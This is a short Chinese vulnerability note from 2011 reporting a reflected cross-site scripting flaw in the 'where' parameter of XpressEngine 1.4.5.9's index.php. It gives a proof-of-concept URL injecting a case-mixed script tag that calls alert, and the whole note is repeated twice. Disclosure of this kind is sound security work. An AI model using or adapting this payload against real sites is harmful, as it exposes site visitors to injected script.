XpressEngine 1.4.5.9
/*菲哥哥
* 2011.8.19
*/XSS
漏洞原因:
index.php 中 where 参数 可以执行 javascript
漏洞URL:
index.php?mid=welcome_page&act=IS&search_target=title_content&is_keyword=111-222-1933email@address.tst&where=1>"><ScRiPt>alert(40897);</ScRiPt>
XpressEngine 1.4.5.9
/*菲哥哥
* 2011.8.19
*/XSS
漏洞原因:
index.php 中 where 参数 可以执行 javascript
漏洞URL:
index.php?mid=welcome_page&act=IS&search_target=title_content&is_keyword=111-222-1933email@address.tst&where=1>"><ScRiPt>alert(40897);</ScRiPt>